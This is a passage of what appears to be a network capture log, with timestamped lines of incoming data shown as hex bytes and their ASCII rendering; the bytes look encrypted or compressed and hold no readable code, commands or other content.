2022-07-08 04:01:38 UTC	96	IN	Data Raw: b3 60 c7 42 18 ec 16 ad 93 35 f3 11 e4 82 64 dd 48 ba a3 a4 67 3b 54 75 4b a8 bf c0 86 ce 03 5c d8 fe fd 8a 6e 3a 47 67 1f cd ea e1 44 00 df 8f 61 ea 7b ee 24 ec 7c bc 2d 75 b9 97 59 3f fd 24 19 e9 34 25 3e d0 ef 05 0b c5 18 da a5 b5 49 17 2f 51 38 3b 90 47 15 48 10 3a cb f1 41 ef ab e5 23 d7 b0 a0 59 34 5a 9e 7a 5a 9f 44 1c c7 fe a1 ef ea af ae 5f bd 95 a8 17 45 ef 04 15 7a 39 89 90 93 9e a4 98 da 48 76 64 86 46 a6 61 ff cc 52 dc bf 32 b0 8c a8 e6 87 1a d7 33 f7 23 00 bb 5c 3c 58 77 b5 c9 eb f4 4a f5 a2 87 7f 0f 35 d5 ea ad 40 5f 38 af 95 d4 c2 58 7e ee 6b 5e 2b dd 70 c3 68 84 06 d7 d2 d6 48 82 84 ce a6 ef ff cc 22 1a 09 68 95 12 2e b3 92 b7 0e 05 ef 56 e9 a8 64 3d 4c 4e f7 e0 d9 69 aa e4 a8 29 a9 4c 4c 5c 41 42 83 40 0d de eb 7b 63 c9 aa 11 38 84 72 01 Data Ascii: `B5dHg;TuK\n:GgDa{$\|-uY?$4%>I/Q8;GH:A#Y4ZzZD_Ez9HvdFaR23#\<XwJ5@_8X~k^+phH"h.Vd=LNi)LL\AB@{c8r
2022-07-08 04:01:38 UTC	97	IN	Data Raw: a3 44 be 57 91 2b 2c dc 37 a0 0a 13 2d 55 c9 cf e2 14 34 10 97 39 85 9a 68 98 34 71 02 9b bc 02 a4 ad 93 ed 04 6d 4d a0 8d 86 27 4a 1b 27 db af b9 1b 99 e3 62 54 9f e0 22 41 ae 60 ad e3 cb 93 e3 2d 58 18 7a 4e e9 b8 6f 7f 83 c5 3f df bd 10 98 6d ba 7d c7 03 26 65 b9 ab 91 35 5f bc 04 64 12 ed 53 a1 9e 83 ea 75 34 d0 35 0f 3b bd 79 8c da fd 84 54 27 9b 02 aa 47 1a 62 8a 35 8c 12 d4 ce 1a ae 4a 20 31 63 1c ad 8c ae 3b c7 01 1f 22 b1 c0 3a d5 87 9f 32 0a 65 37 c5 3d 70 b8 0c 8f 0e 44 7e 79 46 6e a4 e4 21 09 cd 25 bb 60 b4 65 8f b0 23 b4 67 25 ae 3e 61 5b 66 0e 6e 50 5d 87 3e 50 54 cb 21 5f a7 4e 71 1b 2c 41 9f d1 d4 39 b7 c3 d3 e3 51 96 36 96 25 ab 5d cb da 86 52 ad 82 ff ae 32 73 c4 63 5a ed 7c 9d 1a ee 5f 4e 69 84 af 90 e2 0a a6 ac 7f c6 68 eb 8d 46 1f 5b Data Ascii: DW+,7-U49h4qmM'J'bT"A`-XzNo?m}&e5_dSu45;yT'Gb5J 1c;":2e7=pD~yFn!%`e#g%>a[fnP]>PT!_Nq,A9Q6%]R2scZ\|_NihF[
2022-07-08 04:01:38 UTC	98	IN	Data Raw: 14 af 33 7d 51 3b 47 5c 0b de 31 ce 53 ad 8c 9e 4f 12 aa bb 74 25 7e 79 71 b6 8d 0d ad d4 24 73 1f 1c a9 de 0a 3f 01 04 fd d4 14 40 3e 7e cf aa b5 a5 48 ba 57 ac 74 06 fb 88 be 3c c2 47 4d e3 26 03 ed 78 03 f3 d4 f3 bb bb 0c 79 f7 5b 1e d4 71 95 1c c7 8b 25 5e da 1e a5 fa 97 92 66 cf c9 24 f1 5d a2 81 73 07 21 d5 6b c2 86 12 2d 35 dc fc e9 e6 d9 e7 68 36 73 7f 69 48 e6 89 ff 91 0b 08 bf 20 9b ed 15 59 ad 54 8c b0 f5 b8 f5 0d 35 55 79 49 66 1c 9d 67 6c 0c d5 6d 40 97 4d 69 ca 6d 30 28 42 03 7e 7f e3 a6 74 81 93 ec 23 c8 6f b5 3c 1a b8 77 de 99 26 76 b9 a9 91 35 5d bc 17 64 12 ed 74 9b 82 88 d2 df 38 d0 22 11 a8 44 78 a0 dd c2 f7 5f 06 10 0a aa 5c 3a 6c 9b cb 87 2d db c0 03 aa 96 33 24 76 14 40 85 82 3c c6 16 3e cd b0 ec 27 b8 a6 99 25 d6 dc 25 d4 39 72 f6 Data Ascii: 3}Q;G\1SOt%~yq$s?@>~HWt<GM&xy[q%^f$]s!k-5h6siH YT5UyIfglm@Mim0(B~t#o<w&v5]dt8"Dx_\:l-3$v@<>'%%9r
2022-07-08 04:01:38 UTC	99	IN	Data Raw: ff 98 64 d0 41 a9 a9 a5 6d 01 4d 8b 63 84 b9 c8 3d c9 1d 5e fa af ec 80 7a c6 52 5d 30 c1 fb e7 51 66 05 84 61 f1 7b 2f 38 3a 50 90 2b 54 58 72 57 2c f1 2e 20 cd 2b 29 ca 0f c3 0f 28 ed 70 db a4 af 5a 1e 30 5c 2b 31 85 43 1f 45 18 c4 ca dc 56 ce a9 f4 c0 59 07 92 cf 2b 4c 9c 58 f9 8e 4e 0d 11 4c 89 e9 fd c5 f0 43 ae 95 a3 75 94 f1 0d e1 77 1d 97 d4 9f 80 ae 81 d8 4f 08 b2 9d b8 ad 45 fd b2 8f ca 97 7f bb ac 2e ce a9 1b b8 be dd 9f 0e b3 45 04 f6 58 b5 c3 48 fc 5c ee a7 80 63 8c 2e 2e fc 97 d6 5f 3a a6 85 d2 de 42 6c eb fd 4f 3f cd 7a a1 78 ad 14 b2 19 c7 4d 94 98 4f a4 e0 e2 cb b4 14 18 88 82 a2 35 a7 8b a9 ce 8a f8 4c e3 b1 78 a1 4c 41 f7 fb 31 f4 97 f6 a6 21 97 6d 59 59 58 67 b6 dc 1c d1 dc 4e 75 55 b1 38 2a 94 75 8e df db 48 7f 21 c5 af c3 12 ca a1 7c Data Ascii: dAmMc=^zR]0Qfa{/8:P+TXrW,. +)(pZ0\+1CEVY+LXNLCuwOE.EXH\c.._:BlO?zxMO5LxLA1!mYYXgNuU8*uH!\|
2022-07-08 04:01:38 UTC	100	IN	Data Raw: 05 d1 d8 fc ef 15 aa 1f 97 28 8c 93 9e 88 10 60 1f 30 87 59 bf be 9a 4f 04 6d 45 ac 67 af 5a 45 0a 27 dc 27 81 65 99 e2 76 5f 87 db b2 41 bf 62 ad c8 b9 c3 cf 35 50 21 86 6e e9 b3 cd 6e 9a d4 3a cd 4f 5e b0 18 b2 55 dc 9e 39 60 a7 b5 98 30 7f f2 09 9a 15 d7 d8 8d 85 9c fb 72 28 c4 0c 9f 25 43 72 b8 50 87 e3 4b 2f a0 4b ab 56 18 6a 17 9a 8d 3e df f7 e6 b9 9c 39 1d 9f 0e be 8e bd 23 dc 18 2e 65 b0 ec 2d de 82 b3 ab d8 f4 32 cc b4 7f e5 63 7f 1c 4c 65 10 43 7a bd f6 ea 8d 9c 34 b3 7e 1b 8a 86 8b 37 29 33 34 a8 e5 d5 65 5c 05 74 57 7d 1f 2f 58 45 1d 31 73 ad 47 0d 18 2a 55 bd 53 cc 2a b9 db 4f ec 4e 84 c9 84 01 b0 44 d9 d0 90 65 c8 11 bd bd 3a 72 77 7a 4d ea 9e 8d 30 2a 4d 4e 6b 43 70 0d b5 d0 8e d8 df d7 6a 62 86 43 24 cb b0 7d 95 d3 6d 28 fa 78 7a 70 48 9a Data Ascii: (`0YOmEgZE''ev_Ab5P!nn:O^U9`0r(%CrPK/KVj>9#.e-2cLeCz4~7)34e\tW}/XE1sGUSONDe:rwzM0*MNkCpjbC$}m(xzpH
2022-07-08 04:01:38 UTC	101	IN	Data Raw: 57 ef 04 15 65 35 80 fb 6c 30 a5 92 d4 42 06 ec 0a 69 ac 69 e7 b0 8d cc b8 2e 98 5f 28 e6 87 86 a9 b3 e2 3c 2c 2f 52 2b cd 78 34 c9 ea e7 d3 f5 a0 88 49 57 24 d0 fd 27 cd 49 27 a8 ba d4 c2 5a 7c d8 71 4f 2e c7 fa 4e 7e 9d 3d 1a 4e c7 4d 02 83 55 aa ca 70 da be 0b 90 67 84 90 20 c7 11 af 1f 86 f7 73 55 a2 72 a1 c1 5a ef f4 c5 d5 02 e1 b7 25 23 c1 5a 46 55 6f 73 dc 1c db 68 64 72 4a b7 0b 74 17 75 9a ca d6 46 0f a2 c6 56 dd 30 e0 25 74 b3 51 2d 26 1f 12 3a 93 a6 44 0d dd 78 53 76 9d cb 89 13 65 6d 4b 63 ad d7 d8 55 d9 59 aa 97 3b 57 36 b9 90 45 c9 6d 0c 31 57 85 1a 67 7f ee 49 39 ce 36 b4 aa 99 ff fe ae fd 84 58 b6 10 40 b1 00 3a eb 69 aa 24 3f 6a 69 12 44 5a 16 1f de 53 d6 34 97 5e 1c 54 96 c4 c9 d8 2a e6 c6 aa e3 94 19 bc 04 aa aa 28 1b 23 b2 f2 30 3f b9 Data Ascii: We5l0Bii._(<,/R+x4IW$'I'Z\|qO.N~=NMUpg sUrZ%#ZFUoshdrJtuFV0%tQ-&:DxSvemKcUY;W6Em1WgI96X@:i$?jiDZS4^T*(#0?
2022-07-08 04:01:38 UTC	103	IN	Data Raw: 65 82 64 34 8a 14 c0 dd 05 89 9a 33 12 7e 0e be 69 ae 2a de 36 ec dd b0 ea 27 c9 1b ca 25 dc f5 27 c7 28 6b f3 7c 00 91 55 67 0f 4a 0f 25 ff 21 19 d2 46 2d 6e aa 82 91 fd b1 b4 71 2e b7 a3 e9 65 47 0a 7f 2c cb 96 3c 44 50 5b be 62 be 50 01 62 b3 50 86 d1 d6 a7 ee c3 c2 ea 5d 97 d9 84 1f be 32 51 da 92 74 01 db 72 ac 29 6b ca 2b db ec 91 85 29 cb c8 4e 7e 8f b5 a4 7a c1 9d c2 62 ab fc 67 81 4b 13 77 2e 6c 8c e6 63 56 64 63 7a 64 53 b6 ee 56 51 fd f3 de c1 ce 11 78 b9 86 49 6e 4d fb 71 b5 91 91 31 4e e1 ff da be 55 66 44 80 da f7 86 e3 a0 47 9b f7 2b a9 f5 ea 7f da 5a 51 0d 48 49 ef 49 3a d6 7e 97 36 0b 2e 9f 5f 55 a2 ca c4 78 86 49 8d 8e 45 a4 32 8b 02 64 13 57 3c 41 7a 3f 8c e3 21 0d 3e 62 65 ec 92 8a 92 4e d6 6a bc 5b cc 41 08 f4 0e c2 9b 34 f3 1b e1 88 Data Ascii: ed43~i*6'%'(k\|UgJ%!F-nq.eG,<DP[bPbP]2Qtr)k+)N~zbgKw.lcVdczdSVQxInMq1NUfDG+ZQHII:~6._UxIE2dW<Az?!>beNj[A4
2022-07-08 04:01:38 UTC	104	IN	Data Raw: ff a8 ea 9f df be d0 5b 53 76 61 95 dc 16 05 f4 73 5f 55 bb 55 3b 8b 64 9d d5 db 59 75 3e d7 51 f5 3f c0 b0 43 b2 51 b1 22 18 0d 35 91 da d8 1d c9 57 47 60 b5 da 8e 0c 84 7b d7 63 bc db ce 7b e5 48 ad 88 28 50 ae b5 69 5b f1 7c 98 29 61 a4 11 62 e7 ff 5f 22 c0 e8 4a 86 88 fd 0d b8 fb 9b 45 b8 d7 22 49 1f 22 f7 fe a2 30 24 73 58 96 58 a4 17 af c8 5c d1 f8 8d df 1e 57 89 ce db 53 c5 e0 f5 b5 ed 1b 0c bb 0a b3 91 56 1a 0f ac 69 23 30 be 64 1a 51 3b 4d 5c 0b e5 e6 cf 42 ad bb d9 b3 13 8c dd fa 79 7f 73 57 b5 8c 1a a7 c5 31 63 fe 07 7b da 0d a5 1c 3f 70 d6 05 4e 34 88 d1 9d a8 b9 4a c4 5a b2 7e f2 e2 7e ba 08 ee 55 49 e3 28 0c e8 8c 02 ce dd fb a1 41 0d 44 fe 54 e6 fd d6 95 37 c8 a0 7b be 2f f2 a8 95 e5 98 7a 3b e2 13 82 49 a6 34 90 07 21 2e 2e cf 97 3a 1b 5e Data Ascii: [Svas_UU;dYu>Q?CQ"5WG`{c{H(Pi[\|)ab_"JE"I"0$sXX\WSVi#0dQ;M\BysW1c{?pN4JZ~~UI(ADT7{/z;I4!..:^
2022-07-08 04:01:38 UTC	105	IN	Data Raw: 6b 65 bd d9 b4 00 fc 56 55 da fa 33 83 e4 da e1 05 7c c6 68 7e 83 53 24 92 b1 7d 99 94 aa 29 fa 78 61 7f 36 98 2f 52 5b f3 83 c9 eb 5f 19 17 3d 97 4e 66 49 cd 76 a5 8c 85 2d 31 6f ee d0 9c 82 64 55 80 b6 90 ae 72 a8 54 96 f5 2b c5 e2 ed 7e d0 5b e3 6d 59 4e c3 4e 2b d1 11 8a 6d 23 b6 41 81 6a 9b fa e8 7f 9d f8 f1 da 53 b7 30 46 d5 54 d8 44 c6 cb 3a 3b e3 bf 2c 1b 25 b7 ac 2f a4 b2 ac 45 fd 40 a6 42 ef 6c 19 fc 1c 73 99 3d df 17 f6 f7 88 ce 55 b0 7f a2 56 0b 50 75 63 e8 bf c0 2c ce 85 4d fa 3f fd 86 64 38 53 71 35 d7 95 e1 6f f1 16 82 61 e0 71 30 34 c4 76 bc a8 d3 91 61 58 3f fb 2e 31 c7 30 25 82 b4 ef 0c 3c c5 18 db a6 a5 4d 17 ea 98 38 31 85 52 15 5a 1e 0a cf f0 dc df af e5 33 d7 b0 b1 94 39 62 f4 52 f9 9f 44 1f f5 b3 a4 c3 e8 d4 d6 44 b0 9f aa 7d 60 ef Data Ascii: keVU3\|h~S$})xa6/R[_=NfIv-1odUrT+~[mYNN+m#AjS0FTD:;,%/E@Bls=UVPuc,M?d8Sq5oaq04vaX?.10%<M81RZ39bRDD}`
2022-07-08 04:01:38 UTC	107	IN	Data Raw: 56 ed 64 cb 16 83 cf c8 cf 0e 01 c2 0d 53 96 bc 43 42 1b 60 d9 b6 f5 17 67 27 1d 97 08 a8 1b 23 ad 03 bd 3e 86 88 12 50 3b 58 6d 87 cb 1b 4a 42 a7 93 90 d0 8f 80 92 c9 78 7f 79 6e d9 03 18 87 52 35 79 00 19 27 43 20 13 80 2c 74 d6 0b 26 b1 70 f0 39 a6 af 48 b4 38 2f 78 d8 73 a4 b7 04 eb 68 d1 e5 19 82 fe 72 03 fd 8d 70 b4 65 86 55 fa 4a 07 9d 66 91 3c 41 98 20 41 cf 6b 33 fc a6 15 7a 31 c8 17 d3 d0 a0 89 1e 07 21 df 31 bd 1a 14 0d d0 dc fc e9 12 4e 84 91 a8 b0 81 96 9d 32 68 13 25 0c 08 5c bf 9b ed e0 65 52 ba 65 94 00 7f de 20 ca aa 86 74 92 fc 72 b5 92 df 20 50 b7 7f 64 fe 3d 8d de 26 5a 09 6f 65 f6 b4 91 7e be e9 3f de 61 d7 b8 82 90 b6 c9 9e 3f 42 66 a7 91 22 41 8b 70 9a 13 c7 7d 64 84 9c f0 4e f9 d1 24 01 4a 7c 79 a0 da c9 ed 58 25 88 1b a1 4b ec 7c Data Ascii: VdSCB`g'#>P;XmJBxynR5y'C ,t&p9H8/xshrpeUJf<A Ak3z1!1N2h%\eRe tr Pd=&Zoe~?a?Bf"Ap}dN$J\|yX%K\|
2022-07-08 04:01:38 UTC	108	IN	Data Raw: 84 1a 62 d8 50 85 3d 2a 3f 86 f1 27 1c 3d 60 5a 55 80 9a 8b 2a a6 4a b5 40 d6 52 0e 2a 05 bd 82 25 e2 03 cc 44 17 98 55 ba a9 a8 6a 0c 3f cd 63 a8 b5 d7 f4 dd 10 5e fc 97 12 8a 64 38 54 60 3b b8 58 e0 4e 65 3e 5e 65 e0 77 26 1e f4 51 bc 27 69 a2 66 51 17 2a 2a 31 c1 5b 7e 34 0e e5 04 30 c9 77 6a a5 a5 43 3f fd 55 38 3d 93 7a 25 5a 0d 30 dd c3 51 d6 87 36 c3 d7 b6 cf d9 34 5a 85 55 e8 93 2b a6 ee 4d af c7 1c c2 fc 59 ab b7 93 64 9e e4 12 2c 7d 38 b9 2b 40 9f a2 fd 89 4f 19 b2 80 57 a0 06 56 a2 8a d7 97 ed bc ac 2e f0 af 2a b8 b4 ff 35 39 b8 4a 04 03 5c b5 cf 85 bc 4f e4 ad 96 78 9f 4b 60 fc bb d6 66 ea b3 83 4e c5 75 57 f8 f7 45 38 f4 6d 56 51 59 19 c1 48 a8 16 9e 92 58 b0 fb ee b5 0e 0a 0c 7c ab 57 3b b6 8b a8 30 a9 fe 53 fc b4 41 aa 54 63 32 ef cf f3 d4 Data Ascii: bP=?'=`ZUJ@R%DUj?c^d8T`;XNe>^ew&Q'ifQ1[~40wjC?U8=z%Z0Q64ZU+MYd,}8+@OWV.59J\OxK`fNuWE8mVQYHX\|W;0SATc2
2022-07-08 04:01:38 UTC	109	IN	Data Raw: 1e 65 f8 4a 32 fc fa 97 19 cd 98 31 57 db 26 b4 fa 81 8f 84 30 e4 0a aa 47 a6 ae 86 f9 20 f3 2c d8 8d 12 2a 47 22 fd c5 0f 0c 1a bc cb 8e 97 fc c6 0f 1c fe 14 21 08 bf ad ab e9 15 15 52 ab 73 7b 0b 47 1b 37 d9 ae ad 21 99 f2 66 5c 6d f2 06 42 a7 7b b6 ed 24 96 d6 cb 50 25 78 78 83 93 75 6c 96 c0 3f dd 7f 38 b1 34 b6 79 d3 60 3b 6e bc 5d 90 44 7b b9 12 89 17 c1 44 8e 93 62 fb 4a 3f c7 37 03 25 52 7c ba 22 d7 cf 49 05 8a 21 10 40 78 76 8d cf 9a e4 d3 d3 35 ad 9b 2d 57 7e 75 80 85 ae 2e cc 16 c0 4d de 8c 26 df 81 4d 29 d4 fd 05 3c 3e 52 f6 53 78 0f 2a 78 18 55 96 bb ee 23 17 de 3b 8b 1f b5 9b 8e 9c 3e aa 7d 74 56 e5 5b 7d 6c 46 6c 43 55 98 6e 4b 40 35 31 7c b2 7d e0 1d 01 60 97 a6 88 2b bf c7 b1 40 4c 84 c2 8f 63 d2 e0 cd cb 8b 4b b3 9f ec b7 2c 33 e1 6e 45 Data Ascii: eJ21W&0G ,G"!Rs{G7!f\mB{$P%xxul?84y`;n]D{DbJ?7%R\|"I!@xv5-W~u.M&M)<>RSxxU#;>}tV[}lFlCUnK@51\|}`+@LcK,3nE
2022-07-08 04:01:38 UTC	110	IN	Data Raw: 1c 4b 04 ac a4 3d 5b df a9 dc 96 2b 4f 5f 9d 2a 49 80 52 e8 90 5b 06 11 4c 89 fa ee c6 78 4e b5 b7 40 64 9e e4 6b d3 77 31 97 ec 43 80 b5 81 dd 4f 08 b7 98 0e 52 68 ca aa b2 7d b8 38 b8 b3 61 f5 88 1a a9 bb ea 0b f4 b2 6f 0d d7 23 f5 c8 ea e3 3c 4f a5 91 63 8b 4e a3 51 b9 dc 44 15 1a 81 48 d9 4b 27 11 f3 4f 2e d8 4f 4c 76 81 0c ce 51 dc b3 9f be 4e be fb eb d8 af 03 24 95 83 8e 35 a7 8b 96 fb 99 fe 59 99 6e 73 a1 5b d4 f7 f7 dc fa bb f0 b8 3a 89 2e 5c 75 41 4d ee 9c 1d db f0 06 de 57 bb 1e 59 3a 66 9d df f3 f4 77 3e dd 47 82 6b c2 b0 74 ac 66 a2 38 18 1c 3a 93 d4 26 1d f6 6f 45 63 d6 d0 91 03 67 74 d7 63 a5 d6 34 42 69 41 95 87 2c 41 aa b7 9e 49 d2 7b 81 2f 4f 97 f1 70 cf e2 4d 55 73 14 4b a0 86 9b 08 cc 56 99 4f aa a4 fc b4 1f 28 eb ce 79 df df 8c 56 9c Data Ascii: K=[+O_*IR[LxN@dkw1CORh}8ao#<OcNQDHK'O.OLvQN$5Yns[:.\uAMWY:fw>Gktf8:&oEcgtc4BiA,AI{/OpMUsKVO(yV
2022-07-08 04:01:38 UTC	112	IN	Data Raw: 38 6a ac b0 94 3b 40 b0 04 9a 02 ce 4a a9 7b 9d d6 6c 2d d9 33 d1 36 4a 67 84 cf d9 e3 5a 21 97 1d 54 57 3e 76 80 46 d8 3e de de 13 a6 84 20 3a 7c 1f b1 9b 85 d4 ce 32 08 de cb ac 2c d7 92 e8 8e de f4 3e cd 53 0b 49 61 7e 05 6c d9 1a 55 61 ad dd 6a 1e e1 27 bc 7f a8 94 91 82 d1 a4 4e 15 a1 f5 7e 7d 45 18 f6 5c 58 ed f5 34 6c 35 20 73 ad 4d 1e 1c 6d 1a bd eb c8 2a b5 7a 5d f4 51 97 c7 97 18 ae 53 d5 35 80 4f 06 9f fd b5 12 90 d5 6b 4f 92 49 9d 36 fa da 0e 6d 95 ab 92 e2 cf 95 ca 72 c6 73 79 8d 7a f2 52 9c 62 9d 80 3c 29 fa 76 1a dc 5b 9e 27 2c e0 f9 ec c4 c1 f2 11 78 b9 83 0e 81 af 37 98 be b3 93 34 42 e4 e3 cf df 6f 63 68 bd c7 e5 ad 63 a8 29 46 60 36 c5 54 ec 7e dc 23 96 2c 48 43 91 f8 38 d6 74 ff df 21 bc 97 5d 24 b5 fd c4 7c ff 4b 9c 87 59 9f 8c 98 0b Data Ascii: 8j;@J{l-36JgZ!TW>vF> :\|2,>SIa~lUaj'N~}E\X4l5 sMm*z]QS5OkOI6mrsyzRb<)v[',x74Bochc)F`6T~#,HC8t!]$\|KY
2022-07-08 04:01:38 UTC	113	IN	Data Raw: 91 90 4e c7 4c 8d 95 6a 37 eb e2 da af 0e 78 f4 83 8e 3e a7 8a 96 fb 99 fe 59 e1 74 ff f8 5d 4b ea c3 49 f7 bb eb c3 0f bf d0 46 4a 5b 5e 9c cb 90 8a f4 75 74 7d 48 14 27 81 77 91 d7 ca 55 5d dd d7 51 c8 51 0b b1 74 b5 dd e0 37 18 0c 26 85 cb dd 0d dd 4f a0 60 01 d0 01 55 74 7b d5 70 bb c4 e2 a0 45 48 a7 99 21 69 49 a8 97 50 b2 b7 91 20 56 e7 49 70 e3 fb 5f 23 c9 11 63 49 99 ff 68 30 a3 9b 4f a2 f7 17 b7 1f 26 e2 fc d1 1d b5 73 49 92 46 4b 13 92 c8 7c 2a 2e 81 c8 82 0a 89 df dd 3f 7d e0 d9 b2 9a c5 09 bb 1d 9b b7 b9 1e 32 b5 46 c2 38 a6 01 9d 09 3b 47 41 0a c8 2a c9 6a 44 93 8f bb 9c df b2 4c 7a 04 3f 70 a9 9b 01 aa be ef 15 23 06 57 df 26 33 07 2c 34 8d 3c 7c 2d 76 da 08 db ea 49 ab 59 98 12 e9 ff b5 b0 2c 17 46 4d e9 b6 51 fe 72 01 f3 db fd b5 6d ee 55 Data Ascii: NLj7x>Yt]KIFJ[^ut}H'wU]QQt7&O`Ut{pEH!iIP VIp_#cIh0O&sIFK\|.?}2F8;GAjDLz?p#W&3,4<\|-vIY,FMQrmU
2022-07-08 04:01:38 UTC	114	IN	Data Raw: 12 98 a8 35 5a 8f 50 82 df 45 16 eb 3e 0e ed ec ca e5 35 ce 33 a1 64 94 c6 a9 1d 76 3b 87 bf 49 9e a4 92 d0 34 5a b9 87 42 a5 78 e0 75 05 87 bf 38 ba d7 60 e7 87 1e a9 b9 dd 93 08 b3 49 2e ae 66 b4 c9 ee e0 3c 4f a5 91 63 82 2c a3 51 b9 dc 44 15 19 81 48 d9 4c 63 8b 42 4d 2e cd 4e f1 7b 81 17 e9 e1 c5 4d 94 83 57 a6 e7 6d 83 be 0b 0e 0d c6 8f 3f b2 3a d1 c2 99 fe 59 54 9a dd a1 5d 4b ea 90 8c f4 bb e5 be 34 b9 06 d2 03 5e 4f 97 a7 54 da f4 71 64 58 93 22 26 8b 6e 9f ae e5 58 75 3a d0 22 69 3c c0 ba 65 bb 22 1d 35 18 07 1d 22 d8 d8 16 cb 63 30 d5 03 da 84 24 da 79 d7 78 82 67 c8 43 4f 59 a8 99 25 ce f3 a8 97 58 a6 3e 91 20 54 2d 60 ab e3 ff 44 84 f3 42 49 d1 da fe 62 bb f3 8a 49 76 03 0b b6 1f 20 86 bd ba 23 24 62 44 90 43 29 bd 81 cf 5e d8 26 f2 6e 0f 53 Data Ascii: 5ZPE>53dv;I4ZBxu8`I.f<Oc,QDHLcBM.N{MWm?:YT]K4^OTqdX"&nXu:"i<e"5"c0$yxgCOY%X> T-`DBIbIv #$bDC)^&nS
2022-07-08 04:01:38 UTC	115	IN	Data Raw: 55 80 94 97 ed f6 10 db 35 0e 32 d9 50 b1 dc d6 e9 58 2b a0 1b aa 56 18 df 9d da 89 a4 ca f7 c1 bd 9c 35 22 f1 09 be 84 af 39 c5 0f 1c ca 98 0c 29 d7 90 39 34 d6 e0 20 c0 11 e0 e5 63 74 19 c8 25 18 55 6a ad c6 41 03 cd 3e 9f 7d 92 de 8c 9e 54 e1 63 34 ac 90 f5 74 54 10 71 47 42 51 a2 40 4f 35 21 5b 2b 4f 1e 16 59 66 95 dd d3 57 fb c2 c2 ef 4c ff 8c 96 09 a5 5d cb cd 90 67 84 b5 4b bd 3a 79 77 7a 41 ea 54 8f 32 ed 52 4e 65 ab e7 7f 1b 2f 8c db 06 87 63 76 96 50 83 08 b0 7d 9d 80 31 29 fa 76 7e 1d 83 9c 56 6d 50 fb e8 a0 31 e5 7c a8 b2 95 48 46 5a db 57 a3 9d aa 3b 42 f5 ea d0 96 80 74 4f ad de e7 a9 65 5c 46 bd e6 34 a1 9a ea 68 24 51 11 2c 5f 42 ef 4e 22 28 7f fb 6f 08 be b6 bc 5d f1 bf c5 78 88 70 29 ad 53 b7 29 aa 08 73 bc 40 ea cc 23 3f 8c f3 3a 10 04 Data Ascii: U52PX+V5"9)94 ct%UjA>}Tc4tTqGBQ@O5![+OYfWL]gK:ywzAT2RNe/cvP}1)v~VmP1\|HFZW;BtOe\F4h$Q,_BN"(o]xp)S)s@#?:
2022-07-08 04:01:38 UTC	116	IN	Data Raw: 96 5b 0f 76 85 a6 1c b6 8d b4 98 cd ff 53 f2 dc 3d a0 5d 4f c0 b7 cc f5 bd c9 94 25 bf da dd 0c 5f 4f 91 a2 53 da f4 71 5d 0b b8 14 21 a3 47 9d d5 d1 d9 23 3f d7 55 bc 71 c1 b0 70 9b 03 b2 37 1e 25 16 8c da d2 9c 8d 66 43 64 7f 95 8f 0c 70 53 9d 71 aa ce e2 60 45 48 a7 08 70 40 aa ac e9 15 dc 7b 94 08 1c 99 0f 77 cb dc 4e 26 d2 96 12 ab 99 fb 1c f0 fb 9b 4b 88 d4 52 b6 19 0a de f5 bb 29 a0 29 48 92 40 24 59 82 cf 50 e1 74 82 c2 0b 7b aa df df 4e bb ba d8 b6 f1 22 1b 8b 19 b7 a2 a8 1b 23 ba 6e 21 29 b0 00 39 4b 3b 40 54 e5 cc 17 cc 5a ac 93 88 a7 ed 87 9e 4e 6f 74 79 76 b1 61 1f 8b d6 1e 7b 2b e5 55 a4 7a 32 07 28 5e f4 16 49 50 2a d1 b1 a2 85 48 ab 5d a0 4e fa fa 8c b7 04 f4 45 4c e3 28 1e f5 59 18 e2 d9 fb 4c 44 21 57 e2 41 18 fb ec 69 1d e1 9a 37 4a d0 Data Ascii: [vS=]O%_OSq]!G#?Uqp7%fCdpSq`EHp@{wN&KR))H@$YPt{N"#n!)9K;@TZNotyva{+Uz2(^IP*H]NEL(YLD!WAi7J
2022-07-08 04:01:38 UTC	117	IN	Data Raw: 69 bf d2 c7 f2 b0 85 e4 92 1d 8b 56 dc ce 81 72 1b 8a 12 bc 16 70 cd 78 40 fd 93 99 2e 02 57 73 63 97 c5 86 e5 d0 84 c1 20 d0 4c 6c 8b 44 09 53 a1 78 89 05 7d 04 f9 65 7a 72 59 8f 28 48 af fa c0 cc c2 5d 38 c3 b1 fa 49 6d 5a c2 0b 82 9d 80 3b 42 f5 ec d0 d6 ca 41 44 86 c5 e7 ae 72 52 78 c8 cc 1a aa 9a e7 c9 cd 86 b0 01 48 49 ee 42 2c d1 f0 60 7a f9 af 99 52 74 a8 fe cd 60 54 e6 f1 8f 52 b7 30 96 0c 7a c1 60 e9 ce 2b 3f a4 c5 2d 1b 25 43 58 37 81 90 1d 4c ea 9c b8 43 d6 46 28 25 11 87 93 26 c3 12 fe 27 64 cf 55 bc a2 a5 6d 1d 43 70 5a 03 bf c0 2e ce 12 48 e7 51 fc a6 67 20 40 74 37 c6 ed fc b0 6e 3a 9b 66 c8 75 33 36 c2 59 30 02 7f 91 6c 37 c8 fa 2e 3b e1 2a 36 31 0e fe 06 39 3b 19 f6 ad d6 28 17 2f 5b 33 22 96 57 15 4b 08 25 c2 0e 5b f3 a4 ec d6 d3 3e 17 Data Ascii: iVrpx@.Wsc LlDSx}ezrY(H]8ImZ;BADrRxHIB,`zRt`TR0z`+?-%CX7LCF(%&'dUmCpZ.HQg @t7n:fu36Y0l7.;*619;(/[3"WK%[>
2022-07-08 04:01:38 UTC	119	IN	Data Raw: d0 79 53 ab 99 f9 6f ae fd 8f 67 6f 8e 51 b0 08 af fa f5 bb 22 33 6d 58 8c 52 72 f9 87 cf 52 6b 3f 9f d6 19 47 a1 47 df 44 31 f0 de a2 dd c7 0a bb 1d a0 07 af 1b 23 b3 7d 3e 29 b9 1d 3a a0 3f 47 45 b9 dc 24 da 56 b3 bb 17 b1 13 8c 9a e6 7a 7f 73 59 65 9f 1e ad ed f8 78 00 06 5e cb 0e f9 04 2c 72 c1 99 4d 2d 76 d1 a2 86 be 68 bd 4b 3f 2f f8 fa a5 15 15 d4 52 59 f7 11 90 fe 72 09 f6 f6 26 b1 45 0b 42 77 4d 18 fc fb 84 3d dc b9 36 57 5c 5c af fa 87 3a 6b 10 dc 1c a6 64 3e a9 90 0d 35 f7 e4 cc 86 14 3a d2 db fc e9 0c 34 3a 86 0a 9b 97 1a c8 18 76 01 b7 1a 2a ab aa 8f c5 8d 65 52 a1 67 af c1 44 0a 27 dd 27 81 65 99 e2 71 68 82 d0 3c 57 33 39 b2 ed 34 30 de 16 45 1d 6a 46 71 b9 6f 75 86 e8 e5 da 67 c0 a6 95 bf 7d cd 9f 2d 7e be 8b 09 24 57 a9 23 8b 13 c1 5f 99 Data Ascii: 